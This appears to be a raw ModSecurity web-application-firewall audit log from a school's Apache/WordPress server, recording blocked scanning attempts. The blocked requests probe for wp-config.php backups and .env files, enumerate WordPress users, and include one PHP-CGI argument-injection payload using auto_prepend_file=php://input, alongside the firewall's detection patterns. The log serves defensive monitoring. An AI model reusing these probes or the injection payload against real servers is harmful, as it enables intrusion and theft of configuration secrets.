smkn22-jkt.sch.id X-Real-IP: 89.46.106.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 89.46.106.218 X-Forwarded-Proto: http Connection: close Accept: */* --1dd12c18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1dd12c18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746076775936923 871 (- - -) Stopwatch2: 1746076775936923 871; combined=361, p1=297, p2=0, p3=0, p4=0, p5=63, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1dd12c18-Z-- --e0bf2f19-A-- [01/May/2025:12:37:08 +0700] aBMIhI144kZ4LAGlEgwhOQAAAMo 103.236.140.4 35850 103.236.140.4 8181 --e0bf2f19-B-- GET /wp-config.php.org HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 205.196.217.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 205.196.217.53 X-Forwarded-Proto: http Connection: close Accept: */* --e0bf2f19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0bf2f19-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746077828650288 832 (- - -) Stopwatch2: 1746077828650288 832; combined=333, p1=291, p2=0, p3=0, p4=0, p5=42, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0bf2f19-Z-- --302f3c00-A-- [01/May/2025:13:28:12 +0700] aBMUfCgtr0Qsi1mFAsM05AAAAI4 103.236.140.4 48518 103.236.140.4 8181 --302f3c00-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; Moto Z2 Play) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --302f3c00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --302f3c00-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746080892846198 782 (- - -) Stopwatch2: 1746080892846198 782; combined=349, p1=308, p2=0, p3=0, p4=0, p5=41, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --302f3c00-Z-- --5c3bf871-A-- [01/May/2025:13:51:48 +0700] aBMaBI144kZ4LAGlEgwljQAAAMQ 103.236.140.4 53902 103.236.140.4 8181 --5c3bf871-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36 Accept-Charset: utf-8 --5c3bf871-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c3bf871-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746082308338301 792 (- - -) Stopwatch2: 1746082308338301 792; combined=309, p1=268, p2=0, p3=0, p4=0, p5=40, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c3bf871-Z-- --1c02e40f-A-- [01/May/2025:14:42:12 +0700] aBMl1Cgtr0Qsi1mFAsNMbgAAAI8 103.236.140.4 38282 103.236.140.4 8181 --1c02e40f-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 112.74.57.225 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 112.74.57.225 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --1c02e40f-C-- --1c02e40f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c02e40f-E-- --1c02e40f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746085332931302 4232 (- - -) Stopwatch2: 1746085332931302 4232; combined=2635, p1=450, p2=2154, p3=0, p4=0, p5=31, sr=108, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c02e40f-Z-- --5d814b79-A-- [01/May/2025:15:50:36 +0700] aBM13I144kZ4LAGlEgxq6gAAAMw 103.236.140.4 53962 103.236.140.4 8181 --5d814b79-B-- GET /wp-config.phped HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 5.255.118.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 5.255.118.183 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept: */* --5d814b79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d814b79-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746089436562979 924 (- - -) Stopwatch2: 1746089436562979 924; combined=400, p1=362, p2=0, p3=0, p4=0, p5=37, sr=135, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d814b79-Z-- --25121833-A-- [01/May/2025:15:50:37 +0700] aBM13Y144kZ4LAGlEgxq7QAAAMM 103.236.140.4 54008 103.236.140.4 8181 --25121833-B-- GET /wp-config.php.org HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.0 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.0 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept: */* --25121833-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --25121833-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746089437562953 830 (- - -) Stopwatch2: 1746089437562953 830; combined=318, p1=278, p2=0, p3=0, p4=0, p5=40, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25121833-Z-- --c84d693d-A-- [01/May/2025:15:50:38 +0700] aBM13uVeTgVPHjrSAYCQQAAAAAg 103.236.140.4 54066 103.236.140.4 8181 --c84d693d-B-- GET /wp-config.php_old2017 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 109.70.100.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.70.100.68 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept: */* --c84d693d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c84d693d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746089438739490 895 (- - -) Stopwatch2: 1746089438739490 895; combined=309, p1=272, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c84d693d-Z-- --0c8ba81b-A-- [01/May/2025:15:50:39 +0700] aBM134144kZ4LAGlEgxq8gAAAME 103.236.140.4 54096 103.236.140.4 8181 --0c8ba81b-B-- GET /wp-config.php_old2018 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.7 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept: */* --0c8ba81b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c8ba81b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746089439307006 902 (- - -) Stopwatch2: 1746089439307006 902; combined=355, p1=319, p2=0, p3=0, p4=0, p5=36, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c8ba81b-Z-- --913b0e46-A-- [01/May/2025:15:50:40 +0700] aBM14Cgtr0Qsi1mFAsN0vwAAAIw 103.236.140.4 54134 103.236.140.4 8181 --913b0e46-B-- GET /wp-config.php_old2019 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.84 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept: */* --913b0e46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --913b0e46-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746089440060054 1140 (- - -) Stopwatch2: 1746089440060054 1140; combined=349, p1=309, p2=0, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --913b0e46-Z-- --cd2d7369-A-- [01/May/2025:15:50:40 +0700] aBM14Cgtr0Qsi1mFAsN0wgAAAIY 103.236.140.4 54164 103.236.140.4 8181 --cd2d7369-B-- GET /wp-config.php_old2020 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 46.182.21.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 46.182.21.248 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept: */* --cd2d7369-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd2d7369-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746089440795181 849 (- - -) Stopwatch2: 1746089440795181 849; combined=386, p1=355, p2=0, p3=0, p4=0, p5=31, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd2d7369-Z-- --d8249778-A-- [01/May/2025:15:50:52 +0700] aBM17Cgtr0Qsi1mFAsN06wAAAIs 103.236.140.4 54684 103.236.140.4 8181 --d8249778-B-- GET /wp-config.php-bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 109.104.153.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.104.153.22 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept: */* --d8249778-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8249778-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746089452524719 607 (- - -) Stopwatch2: 1746089452524719 607; combined=207, p1=181, p2=0, p3=0, p4=0, p5=25, sr=49, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8249778-Z-- --6c7e1b05-A-- [01/May/2025:15:50:53 +0700] aBM17cVMAgMJpNzaVtId7gAAAEk 103.236.140.4 54754 103.236.140.4 8181 --6c7e1b05-B-- GET /wp-config.php_bk HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 193.189.100.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.189.100.199 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept: */* --6c7e1b05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c7e1b05-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746089453964500 699 (- - -) Stopwatch2: 1746089453964500 699; combined=248, p1=209, p2=0, p3=0, p4=0, p5=38, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c7e1b05-Z-- --a3c7b011-A-- [01/May/2025:16:00:51 +0700] aBM4Q-VeTgVPHjrSAYCSewAAABc 103.236.140.4 35844 103.236.140.4 8181 --a3c7b011-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a3c7b011-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3c7b011-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746090051182252 3089 (- - -) Stopwatch2: 1746090051182252 3089; combined=1318, p1=430, p2=852, p3=0, p4=0, p5=35, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3c7b011-Z-- --47123574-A-- [01/May/2025:16:00:53 +0700] aBM4RcVMAgMJpNzaVtIgPAAAAFg 103.236.140.4 35860 103.236.140.4 8181 --47123574-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.9 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --47123574-C-- demo.sayHello --47123574-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --47123574-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746090053969166 5343 (- - -) Stopwatch2: 1746090053969166 5343; combined=4226, p1=526, p2=3440, p3=29, p4=34, p5=112, sr=77, sw=85, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47123574-Z-- --a5efa726-A-- [01/May/2025:16:14:35 +0700] aBM7eygtr0Qsi1mFAsN3fAAAAIM 103.236.140.4 39000 103.236.140.4 8181 --a5efa726-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a5efa726-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5efa726-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746090875695812 2770 (- - -) Stopwatch2: 1746090875695812 2770; combined=1279, p1=426, p2=825, p3=0, p4=0, p5=28, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5efa726-Z-- --36e97826-A-- [01/May/2025:16:14:39 +0700] aBM7figtr0Qsi1mFAsN3fwAAAJU 103.236.140.4 39016 103.236.140.4 8181 --36e97826-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.192 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --36e97826-C-- demo.sayHello --36e97826-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --36e97826-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746090878998762 6991 (- - -) Stopwatch2: 1746090878998762 6991; combined=4979, p1=648, p2=4026, p3=38, p4=53, p5=122, sr=75, sw=92, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36e97826-Z-- --a8e9ed02-A-- [01/May/2025:16:17:53 +0700] aBM8QY144kZ4LAGlEgxutgAAANY 103.236.140.4 39762 103.236.140.4 8181 --a8e9ed02-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.5 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a8e9ed02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8e9ed02-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746091073247732 2113 (- - -) Stopwatch2: 1746091073247732 2113; combined=987, p1=332, p2=633, p3=0, p4=0, p5=22, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8e9ed02-Z-- --e0efce74-A-- [01/May/2025:16:17:56 +0700] aBM8RI144kZ4LAGlEgxutwAAAM0 103.236.140.4 39778 103.236.140.4 8181 --e0efce74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.5 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e0efce74-C-- demo.sayHello --e0efce74-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0efce74-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] 